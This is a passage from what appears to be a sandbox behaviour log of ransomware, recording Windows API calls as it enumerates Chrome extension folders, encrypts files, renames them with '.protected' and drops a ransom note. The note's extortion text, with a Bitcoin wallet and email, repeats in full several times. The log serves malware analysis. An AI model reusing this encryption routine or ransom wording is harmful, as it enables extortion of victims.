guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.182] lstrlenA (lpString="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") returned 684 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.182] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.182] CloseHandle (hObject=0x164) returned 1 [0080.183] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0080.183] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th") returned 141 [0080.183] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0080.183] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*") returned 143 [0080.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.183] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\.") returned 143 [0080.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.183] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\..") returned 144 [0080.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.183] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.183] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.183] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.183] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.184] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.184] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.185] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.185] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0080.185] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.185] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0080.185] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.186] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.186] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.186] CloseHandle (hObject=0x168) returned 1 [0080.186] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected") returned 165 [0080.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0080.186] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.186] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.186] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0080.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.187] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.187] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.188] lstrlenA (lpString="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") returned 684 [0080.188] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.188] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.188] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.188] CloseHandle (hObject=0x164) returned 1 [0080.188] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0080.188] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr") returned 141 [0080.188] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0080.188] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0080.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*") returned 143 [0080.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.188] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.188] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\.") returned 143 [0080.188] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.188] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.189] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.189] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\..") returned 144 [0080.189] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.189] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.189] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.189] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.189] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.189] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.189] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.189] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.189] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.189] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.190] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.190] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.190] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0080.190] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.190] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0080.190] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.191] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.191] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.191] CloseHandle (hObject=0x168) returned 1 [0080.191] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected") returned 165 [0080.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0080.192] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.192] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.192] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0080.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.194] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.194] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.196] lstrlenA (lpString="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") returned 684 [0080.196] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.196] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.196] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.196] CloseHandle (hObject=0x164) returned 1 [0080.197] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0080.197] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk") returned 141 [0080.197] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0080.197] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0080.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*") returned 143 [0080.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.197] lstrcmpiW 
